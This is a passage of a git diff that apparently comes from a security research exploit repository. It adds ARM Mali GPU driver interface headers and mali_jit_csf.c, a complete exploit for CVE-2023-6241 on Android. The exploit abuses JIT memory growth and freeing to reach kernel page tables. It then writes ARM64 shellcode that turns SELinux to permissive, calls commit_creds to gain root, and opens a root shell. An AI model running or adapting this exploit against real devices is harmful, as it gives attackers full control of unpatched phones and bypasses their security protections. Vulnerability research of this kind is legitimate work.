@padding: Padding for 64bit boundary + * @payload: Input Payload + * @payload.align: To fit the struct into a 64-byte cache line + * @payload.csg_error: CSG error + * @payload.csg_error.handle: Handle of GPU command queue group associated with + * fatal error + * @payload.csg_error.padding: Padding + * @payload.csg_error.error: Unrecoverable fault error + * + */ +struct base_csf_notification { + __u8 type; + __u8 padding[7]; + union { + struct { + __u8 handle; + __u8 padding[7]; + struct base_gpu_queue_group_error error; + } csg_error; + + __u8 align[56]; + } payload; +}; + +/** + * struct mali_base_gpu_core_props - GPU core props info + * + * @product_id: Pro specific value. + * @version_status: Status of the GPU release. No defined values, but starts at + * 0 and increases by one for each release status (alpha, beta, EAC, etc.). + * 4 bit values (0-15). + * @minor_revision: Minor release number of the GPU. "P" part of an "RnPn" + * release number. + * 8 bit values (0-255). + * @major_revision: Major release number of the GPU. "R" part of an "RnPn" + * release number. + * 4 bit values (0-15). + * @padding: padding to align to 8-byte + * @gpu_freq_khz_max: The maximum GPU frequency. Reported to applications by + * clGetDeviceInfo() + * @log2_program_counter_size: Size of the shader program counter, in bits. + * @texture_features: TEXTURE_FEATURES_x registers, as exposed by the GPU. This + * is a bitpattern where a set bit indicates that the format is supported. + * Before using a texture format, it is recommended that the corresponding + * bit be checked. + * @gpu_available_memory_size: Theoretical maximum memory available to the GPU. + * It is unlikely that a client will be able to allocate all of this memory + * for their own purposes, but this at least provides an upper bound on the + * memory available to the GPU. + * This is required for OpenCL's clGetDeviceInfo() call when + * CL_DEVICE_GLOBAL_MEM_SIZE is requested, for OpenCL GPU devices. The + * client will not be expecting to allocate anywhere near this value. + */ +struct mali_base_gpu_core_props { + __u32 product_id; + __u16 version_status; + __u16 minor_revision; + __u16 major_revision; + __u16 padding; + __u32 gpu_freq_khz_max; + __u32 log2_program_counter_size; + __u32 texture_features[BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS]; + __u64 gpu_available_memory_size; +}; + +#endif /* _UAPI_BASE_CSF_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h new file mode 100644 index 0000000..c0b4d50 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h @@ -0,0 +1,287 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2010-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +/* + * Base structures shared with the kernel. + */ + +#ifndef _UAPI_BASE_KERNEL_H_ +#define _UAPI_BASE_KERNEL_H_ + +#include + +#define BASE_MAX_COHERENT_GROUPS 16 + +/* Physical memory group ID for normal usage. + */ +#define BASE_MEM_GROUP_DEFAULT (0) + +/* Physical memory group ID for explicit SLC allocations. + */ +#define BASE_MEM_GROUP_PIXEL_SLC_EXPLICIT (2) + +/* Number of physical memory groups. + */ +#define BASE_MEM_GROUP_COUNT (16) + +/** + * typedef base_mem_alloc_flags - Memory allocation, access/hint flags. + * + * A combination of MEM_PROT/MEM_HINT flags must be passed to each allocator + * in order to determine the best cache policy. Some combinations are + * of course invalid (e.g. MEM_PROT_CPU_WR | MEM_HINT_CPU_RD), + * which defines a write-only region on the CPU side, which is + * heavily read by the CPU... + * Other flags are only meaningful to a particular allocator. + * More flags can be added to this list, as long as they don't clash + * (see BASE_MEM_FLAGS_NR_BITS for the number of the first free bit). + */ +typedef __u32 base_mem_alloc_flags; + + +struct base_mem_handle { + struct { + __u64 handle; + } basep; +}; + +/** + * enum base_mem_import_type - Memory types supported by @a base_mem_import + * + * @BASE_MEM_IMPORT_TYPE_INVALID: Invalid type + * @BASE_MEM_IMPORT_TYPE_UMM: UMM import. Handle type is a file descriptor (int) + * @BASE_MEM_IMPORT_TYPE_USER_BUFFER: User buffer import. Handle is a + * base_mem_import_user_buffer + * + * Each type defines what the supported handle type is. + * + * If any new type is added here ARM must be contacted + * to allocate a numeric value for it. + * Do not just add a new type without synchronizing with ARM + * as future releases from ARM might include other new types + * which could clash with your custom types. + */ +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. + */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/* + * struct base_fence - Cross-device synchronisation fence. + * + * A fence is used to signal when the GPU has finished accessing a resource that + * may be shared with other devices, and also to delay work done asynchronously + * by the GPU until other devices have finished accessing a shared resource. + */ +struct base_fence { + struct { + int fd; + int stream_fd; + } basep; +}; + +/** + * struct base_mem_aliasing_info - Memory aliasing info + * + * @handle: Handle to alias, can be BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * @offset: Offset within the handle to start aliasing from, in pages. + * Not used with BASE_MEM_WRITE_ALLOC_PAGES_HANDLE. + * @length: Length to alias, in pages. For BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * specifies the number of times the special page is needed. + * + * Describes a memory handle to be aliased. + * A subset of the handle can be chosen for aliasing, given an offset and a + * length. + * A special handle BASE_MEM_WRITE_ALLOC_PAGES_HANDLE is used to represent a + * region where a special page is mapped with a write-alloc cache setup, + * typically used when the write result of the GPU isn't needed, but the GPU + * must write anyway. + * + * Offset and length are specified in pages. + * Offset must be within the size of the handle. + * Offset+length must not overrun the size of the handle. + */ +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +/* Maximum percentage of just-in-time memory allocation trimming to perform + * on free. + */ +#define BASE_JIT_MAX_TRIM_LEVEL (100) + +/* Maximum number of concurrent just-in-time memory allocations. + */ +#define BASE_JIT_ALLOC_COUNT (255) + +/* base_jit_alloc_info in use for kernel driver versions 10.2 to early 11.5 + * + * jit_version is 1 + * + * Due to the lack of padding specified, user clients between 32 and 64-bit + * may have assumed a different size of the struct + * + * An array of structures was not supported + */ +struct base_jit_alloc_info_10_2 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; +}; + +/* base_jit_alloc_info introduced by kernel driver version 11.5, and in use up + * to 11.19 + * + * This structure had a number of modifications during and after kernel driver + * version 11.5, but remains size-compatible throughout its version history, and + * with earlier variants compatible with future variants by requiring + * zero-initialization to the unused space in the structure. + * + * jit_version is 2 + * + * Kernel driver version history: + * 11.5: Initial introduction with 'usage_id' and padding[5]. All padding bytes + * must be zero. Kbase minor version was not incremented, so some + * versions of 11.5 do not have this change. + * 11.5: Added 'bin_id' and 'max_allocations', replacing 2 padding bytes (Kbase + * minor version not incremented) + * 11.6: Added 'flags', replacing 1 padding byte + * 11.10: Arrays of this structure are supported + */ +struct base_jit_alloc_info_11_5 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; +}; + +/** + * struct base_jit_alloc_info - Structure which describes a JIT allocation + * request. + * @gpu_alloc_addr: The GPU virtual address to write the JIT + * allocated GPU virtual address to. + * @va_pages: The minimum number of virtual pages required. + * @commit_pages: The minimum number of physical pages which + * should back the allocation. + * @extension: Granularity of physical pages to grow the + * allocation by during a fault. + * @id: Unique ID provided by the caller, this is used + * to pair allocation and free requests. + * Zero is not a valid value. + * @bin_id: The JIT allocation bin, used in conjunction with + * @max_allocations to limit the number of each + * type of JIT allocation. + * @max_allocations: The maximum number of allocations allowed within + * the bin specified by @bin_id. Should be the same + * for all allocations within the same bin. + * @flags: flags specifying the special requirements for + * the JIT allocation, see + * %BASE_JIT_ALLOC_VALID_FLAGS + * @padding: Expansion space - should be initialised to zero + * @usage_id: A hint about which allocation should be reused. + * The kernel should attempt to use a previous + * allocation with the same usage_id + * @heap_info_gpu_addr: Pointer to an object in GPU memory describing + * the actual usage of the region. + * + * jit_version is 3. + * + * When modifications are made to this structure, it is still compatible with + * jit_version 3 when: a) the size is unchanged, and b) new members only + * replace the padding bytes. + * + * Previous jit_version history: + * jit_version == 1, refer to &base_jit_alloc_info_10_2 + * jit_version == 2, refer to &base_jit_alloc_info_11_5 + * + * Kbase version history: + * 11.20: added @heap_info_gpu_addr + */ +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +enum base_external_resource_access { + BASE_EXT_RES_ACCESS_SHARED, + BASE_EXT_RES_ACCESS_EXCLUSIVE +}; + +struct base_external_resource { + __u64 ext_resource; +}; + +/** + * BASE_EXT_RES_COUNT_MAX - The maximum number of external resources + * which can be mapped/unmapped in a single request. + */ +#define BASE_EXT_RES_COUNT_MAX 10 + +/** + * struct base_external_resource_list - Structure which describes a list of + * external resources. + * @count: The number of resources. + * @ext_res: Array of external resources which is + * sized at allocation time. + */ +struct base_external_resource_list { + __u64 count; + struct base_external_resource ext_res[1]; +}; + +#endif /* _UAPI_BASE_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c new file mode 100644 index 0000000..724d031 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c @@ -0,0 +1,435 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include + +//From https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17 +#include "CL/cl.h" +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" +#include "mem_read_write.h" +#include "mempool_utils.h" +#include "firmware_offsets.h" + +#define MALI "/dev/mali0" + +//#define GROW_SIZE 0x2000 + +#define GROW_SIZE (0x2000 - 10) + +#define FREED_NUM 1 + +#define JIT_SIZE 0x23d0 + +#define FAULT_SIZE 0x300 + +#define PTE_PAGES 0x200 + +#define PTE_SIZE (PTE_PAGES << 12) + +#define TEST_VAL 0x42424242 + +#define THRESHOLD 0x2300 + +#define REUSE_REG_SIZE 0x100 + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; + +uint64_t reused_regions[REUSE_REG_SIZE] = {0}; + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2311; + +static uint64_t avc_deny = AVC_DENY_2311; + +/* +Overwriting SELinux to permissive + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +int find_mali_fd() { + int test_fd = open("/dev/null", O_RDWR); + char file_path[256]; + char proc_string[256]; + for (int i = 3; i < test_fd; i++) { + sprintf(proc_string, "/proc/self/fd/%d", i); + if(readlink(proc_string, file_path, 256) > 0) { + if (strcmp(file_path, MALI) == 0) { + close(test_fd); + return i; + } + } + } + close(test_fd); + return -1; +} + +void setup_mali(int fd, int group_id) { + + struct kbase_ioctl_version_check param = {0}; + if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { + LOG("major %d\n", param.major); + err(1, "version check failed\n"); + } + + struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { + err(1, "set flags failed\n"); + } +} + +void* setup_tracking_page(int fd) { + void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE); + if (region == MAP_FAILED) { + err(1, "setup tracking page failed"); + } + return region; +} + +void mem_query(int fd, union kbase_ioctl_mem_query* query) { + if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) { + err(1, "mem_query failed\n"); + } +} + +void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) { + struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages}; + if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) { + LOG("commit failed\n"); + } +} + +uint64_t get_mem_size(int fd, uint64_t gpu_addr) { + union kbase_ioctl_mem_query query = {0}; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + query.in.gpu_addr = gpu_addr; + mem_query(fd, &query); + return query.out.value; +} + +void queue_register(int fd, uint64_t queue_addr, uint32_t queue_pages) { + struct kbase_ioctl_cs_queue_register reg = {0}; + reg.buffer_gpu_addr = queue_addr; + reg.buffer_size = queue_pages; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_REGISTER, ®) < 0) { + err(1, "register queue failed\n"); + } +} + +uint64_t queue_bind(int fd, uint64_t queue_addr, uint8_t group_handle, uint8_t csi_index) { + union kbase_ioctl_cs_queue_bind bind = {0}; + bind.in.buffer_gpu_addr = queue_addr; + bind.in.group_handle = group_handle; + bind.in.csi_index = csi_index; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_BIND, &bind) < 0) { + err(1, "bind queue failed\n"); + } + return bind.out.mmap_handle; +} + +uint8_t kcpu_queue_new(int fd) { + struct kbase_ioctl_kcpu_queue_new queue_new = {0}; + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_CREATE, &queue_new) < 0) { + err(1, "kcpu queue create failed\n"); + } + return queue_new.id; +} + +void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { + struct kbase_ioctl_mem_jit_init init = {0}; + init.va_pages = va_pages; + init.max_allocations = 255; + init.trim_level = trim_level; + init.group_id = group_id; + init.phys_pages = va_pages; + + if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) { + err(1, "jit init failed\n"); + } +} + +uint64_t jit_allocate(int fd, uint8_t queue_id, uint8_t jit_id, uint64_t va_pages, uint64_t commit_pages, uint8_t bin_id, uint16_t usage_id, uint64_t gpu_alloc_addr) { + *((uint64_t*)gpu_alloc_addr) = 0; + struct base_jit_alloc_info info = {0}; + info.id = jit_id; + info.gpu_alloc_addr = gpu_alloc_addr; + info.va_pages = va_pages; + info.commit_pages = commit_pages; + info.extension = 1; + info.bin_id = bin_id; + info.usage_id = usage_id; + + struct base_kcpu_command_jit_alloc_info jit_alloc_info = {0}; + jit_alloc_info.info = (uint64_t)(&info); + jit_alloc_info.count = 1; + struct base_kcpu_command cmd = {0}; + cmd.info.jit_alloc = jit_alloc_info; + cmd.type = BASE_KCPU_COMMAND_TYPE_JIT_ALLOC; + struct kbase_ioctl_kcpu_queue_enqueue enq = {0}; + enq.id = queue_id; + enq.nr_commands = 1; + enq.addr = (uint64_t)(&cmd); + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_ENQUEUE, &enq) < 0) { + err(1, "jit allocate failed\n"); + } + volatile uint64_t ret = *((uint64_t*)gpu_alloc_addr); + while (ret == 0) { + ret = *((uint64_t*)gpu_alloc_addr); + } + return ret; +} + +void jit_free(int fd, uint8_t queue_id, uint8_t jit_id) { + uint8_t free_id = jit_id; + struct base_kcpu_command_jit_free_info info = {0}; + info.ids = (uint64_t)(&free_id); + info.count = 1; + struct base_kcpu_command cmd = {0}; + cmd.info.jit_free = info; + cmd.type = BASE_KCPU_COMMAND_TYPE_JIT_FREE; + struct kbase_ioctl_kcpu_queue_enqueue enq = {0}; + enq.id = queue_id; + enq.nr_commands = 1; + enq.addr = (uint64_t)(&cmd); + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_ENQUEUE, &enq) < 0) { + err(1, "jit free failed\n"); + } +} + +void* jit_grow(void* args) { + uint64_t* arguments = (uint64_t*)args; + int mali_fd = arguments[0]; + int qid = arguments[1]; + int jit_id = arguments[2]; + uint64_t gpu_alloc_addr = arguments[3]; + uint64_t addr = jit_allocate(mali_fd, qid, jit_id, JIT_SIZE, GROW_SIZE, 1, 1, gpu_alloc_addr); + LOG("jit_grow addr %lx\n", addr); + return NULL; +} + +void create_reuse_regions(int mali_fd, uint64_t* reuse_regions, size_t size) { + for (int i = 0; i < size; i++) { + reuse_regions[i] = (uint64_t)map_gpu(mali_fd, 1, 1, false, 0); + memset((void*)(reused_regions[i]), 0, 0x1000); + } +} + +uint64_t find_reused_page(uint64_t* reuse_regions, size_t size) { + for (int i = 0; i < size; i++) { + uint64_t* region_start = (uint64_t*)(reused_regions[i]); + for (int j = 0; j < 0x1000/sizeof(uint64_t); j++) { + if (region_start[j] == TEST_VAL) { + LOG("found reused page %lx, %d\n", (uint64_t)region_start, j); + return (uint64_t)region_start; + } + } + } + return -1; +} + +int find_pgd(int mali_fd, uint64_t gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel, uint64_t* out) { + int ret = -1; + uint64_t read_addr = gpu_addr; + for (int i = 0; i < 0x1000/8; i++) { + uint64_t entry = read_from(mali_fd, &read_addr, command_queue, kernel); + read_addr += 8; + if ((entry & 0x443) == 0x443) { + *out = entry; + return i; + } + } + return ret; +} + +void write_shellcode(int mali_fd, uint64_t pgd, uint64_t* reserved, cl_command_queue command_queue, struct rw_mem_kernel* kernel, struct rw_mem_kernel* kernel32) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + uint64_t overwrite_index = pgd + OVERWRITE_INDEX * sizeof(uint64_t); + write_to(mali_fd, &overwrite_index, &avc_deny_addr, command_queue, kernel); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, &overwrite_index, &sel_read_enforce_addr, command_queue, kernel); + + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); +} + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + fixup_root_shell(INIT_CRED_2311, COMMIT_CREDS_2311, SEL_READ_ENFORCE_2311, ADD_INIT_2311, ADD_COMMIT_2311, &(root_code[0])); + cl_platform_id platform_id = NULL; + cl_device_id device_id = NULL; + cl_uint ret_num_devices; + cl_uint ret_num_platforms; + + cl_int ret = clGetPlatformIDs(1, &platform_id, &ret_num_platforms); + if (ret != CL_SUCCESS) { + err(1, "fail to get platform\n"); + } + int mali_fd = find_mali_fd(); + LOG("mali_fd %d\n", mali_fd); + + uint8_t qid = kcpu_queue_new(mali_fd); + void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0); + memset(gpu_alloc_addr, 0, 0x1000); + + uint64_t test_jit_id = 1; + uint64_t test_jit_addr = jit_allocate(mali_fd, qid, test_jit_id, 1, 0, 0, 0, (uint64_t)gpu_alloc_addr); + uint64_t remainder = test_jit_addr % PTE_SIZE; + if (remainder) { + test_jit_id++; + jit_allocate(mali_fd, qid, test_jit_id, (PTE_PAGES + 1 - (remainder >> 12)), 0, 0, 0, (uint64_t)gpu_alloc_addr); + } + + uint64_t corrupted_jit_id = test_jit_id + 1; + uint64_t second_jit_id = corrupted_jit_id + 1; + + uint64_t corrupted_jit_addr = jit_allocate(mali_fd, qid, corrupted_jit_id, JIT_SIZE, 1, 1, 1, (uint64_t)gpu_alloc_addr); + + LOG("corrupted_jit_addr %lx\n", corrupted_jit_addr); + + jit_free(mali_fd, qid, corrupted_jit_id); + + ret = clGetDeviceIDs( platform_id, CL_DEVICE_TYPE_DEFAULT, 1, + &device_id, &ret_num_devices); + if (ret != CL_SUCCESS) { + err(1, "fail to get Device ID\n"); + } + + cl_context context = clCreateContext( NULL, 1, &device_id, NULL, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create context\n"); + } + + cl_command_queue command_queue = clCreateCommandQueueWithProperties(context, device_id, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create command_queue\n"); + } + + + uint64_t write_addr = corrupted_jit_addr + FAULT_SIZE * 0x1000; + uint64_t value = 32; + uint64_t write = 1; + + struct rw_mem_kernel kernel = create_rw_mem(context, &device_id, true); + struct rw_mem_kernel kernel32 = create_rw_mem(context, &device_id, false); + + ret = clEnqueueWriteBuffer(command_queue, kernel.va, CL_TRUE, 0, sizeof(uint64_t), &write_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel.in_out, CL_TRUE, 0, sizeof(uint64_t), &value, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel.flag, CL_TRUE, 0, sizeof(uint64_t), &write, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + LOG("queue kernel\n"); + pthread_t thread; + uint64_t args[4]; + args[0] = mali_fd; + args[1] = qid; + args[2] = corrupted_jit_id; + args[3] = (uint64_t)gpu_alloc_addr; + + pthread_create(&thread, NULL, &jit_grow, (void*)&(args[0])); + ret = clEnqueueNDRangeKernel(command_queue, kernel.kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + usleep(10000); + ret = clFlush(command_queue); + + pthread_join(thread, NULL); + uint64_t region_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Size after grow: %lx\n", region_size); + + write_addr = corrupted_jit_addr + (FAULT_SIZE + GROW_SIZE + 0xd0) * 0x1000; + write_to(mali_fd, &write_addr, &value, command_queue, &kernel); + + uint64_t final_grow_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Final grow size: %lx\n", final_grow_size); + + uint64_t keep_alive_jit_addr = jit_allocate(mali_fd, qid, second_jit_id + 1, 10, 10, 0, 0, (uint64_t)gpu_alloc_addr); + LOG("keep alive jit_addr %lx\n", keep_alive_jit_addr); + + jit_free(mali_fd, qid, corrupted_jit_id); + usleep(10000); + uint64_t trimmed_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Size after free: %lx, trim_level %lu\n", trimmed_size, 100 - (trimmed_size * 100)/final_grow_size); + + uint64_t reclaim_addr = jit_allocate(mali_fd, qid, corrupted_jit_id, JIT_SIZE, trimmed_size, 1, 1, (uint64_t)gpu_alloc_addr); + if (reclaim_addr != corrupted_jit_addr) { + err(1, "Inconsistent address when reclaiming freed jit region %lx %lx\n", reclaim_addr, corrupted_jit_addr); + } + + create_reuse_regions(mali_fd, &(reused_regions[0]), REUSE_REG_SIZE); + + value = TEST_VAL; + write_addr = corrupted_jit_addr + (THRESHOLD) * 0x1000; + LOG("writing to gpu_va %lx\n", write_addr); + write_to(mali_fd, &write_addr, &value, command_queue, &kernel); + + uint64_t reused_addr = find_reused_page(&(reused_regions[0]), REUSE_REG_SIZE); + if (reused_addr == -1) { + err(1, "Cannot find reused page\n"); + } + reserve_pages(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + + mem_commit(mali_fd, reused_addr, 0); + map_reserved(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + + uint64_t entry = 0; + int res = find_pgd(mali_fd, write_addr, command_queue, &kernel, &entry); + if (res == -1) { + err(1, "Cannot find page table entry\n"); + } + LOG("pgd entry found at index %d %lx\n", res, entry); + + write_shellcode(mali_fd, write_addr, &(reserved[0]), command_queue, &kernel, &kernel32); + run_enforce(); + cleanup(mali_fd, write_addr, command_queue, &kernel); + + ret = clFinish(command_queue); + releaseKernel(&kernel); + releaseKernel(&kernel32); + ret = clReleaseCommandQueue(command_queue); + ret = clReleaseContext(context); + system("sh"); + } diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h new file mode 100644 index 0000000..91249ca --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h @@ -0,0 +1,556 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_CSF_IOCTL_H_ +#define _UAPI_KBASE_CSF_IOCTL_H_ + +#include +#include + +/* + * 1.0: + * - CSF IOCTL header separated from JM + * 1.1: + * - Add a new priority level BASE_QUEUE_GROUP_PRIORITY_REALTIME + * - Add ioctl 54: This controls the priority setting. + * 1.2: + * - Add new CSF GPU_FEATURES register into the property structure + * returned by KBASE_IOCTL_GET_GPUPROPS + * 1.3: + * - Add __u32 group_uid member to + * &struct_kbase_ioctl_cs_queue_group_create.out + * 1.4: + * - Replace padding in kbase_ioctl_cs_get_glb_iface with + * instr_features member of same size + * 1.5: + * - Add ioctl 40: kbase_ioctl_cs_queue_register_ex, this is a new + * queue registration call with extended format for supporting CS + * trace configurations with CSF trace_command. + * 1.6: + * - Added new HW performance counters interface to all GPUs. + * 1.7: + * - Added reserved field to QUEUE_GROUP_CREATE ioctl for future use + * 1.8: + * - Removed Kernel legacy HWC interface + * 1.9: + * - Reorganization of GPU-VA memory zones, including addition of + * FIXED_VA zone and auto-initialization of EXEC_VA zone. + * - Added new Base memory allocation interface + * 1.10: + * - First release of new HW performance counters interface. + * 1.11: + * - Dummy model (no mali) backend will now clear HWC values after each sample + * 1.12: + * - Added support for incremental rendering flag in CSG create call + * 1.13: + * - Added ioctl to query a register of USER page. + * 1.14: + * - Added support for passing down the buffer descriptor VA in tiler heap init + */ + +#define BASE_UK_VERSION_MAJOR 1 +#define BASE_UK_VERSION_MINOR 14 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + +/** + * struct kbase_ioctl_cs_queue_register - Register a GPU command queue with the + * base back-end + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * + * Note: There is an identical sub-section in kbase_ioctl_cs_queue_register_ex. + * Any change of this struct should also be mirrored to the latter. + */ +struct kbase_ioctl_cs_queue_register { + __u64 buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER \ + _IOW(KBASE_IOCTL_TYPE, 36, struct kbase_ioctl_cs_queue_register) + +/** + * struct kbase_ioctl_cs_queue_kick - Kick the GPU command queue group scheduler + * to notify that a queue has been updated + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_kick { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_KICK \ + _IOW(KBASE_IOCTL_TYPE, 37, struct kbase_ioctl_cs_queue_kick) + +/** + * union kbase_ioctl_cs_queue_bind - Bind a GPU command queue to a group + * + * @in: Input parameters + * @in.buffer_gpu_addr: GPU address of the buffer backing the queue + * @in.group_handle: Handle of the group to which the queue should be bound + * @in.csi_index: Index of the CSF interface the queue should be bound to + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.mmap_handle: Handle to be used for creating the mapping of CS + * input/output pages + */ +union kbase_ioctl_cs_queue_bind { + struct { + __u64 buffer_gpu_addr; + __u8 group_handle; + __u8 csi_index; + __u8 padding[6]; + } in; + struct { + __u64 mmap_handle; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_BIND \ + _IOWR(KBASE_IOCTL_TYPE, 39, union kbase_ioctl_cs_queue_bind) + +/** + * struct kbase_ioctl_cs_queue_register_ex - Register a GPU command queue with the + * base back-end in extended format, + * involving trace buffer configuration + * + * @buffer_gpu_addr: GPU 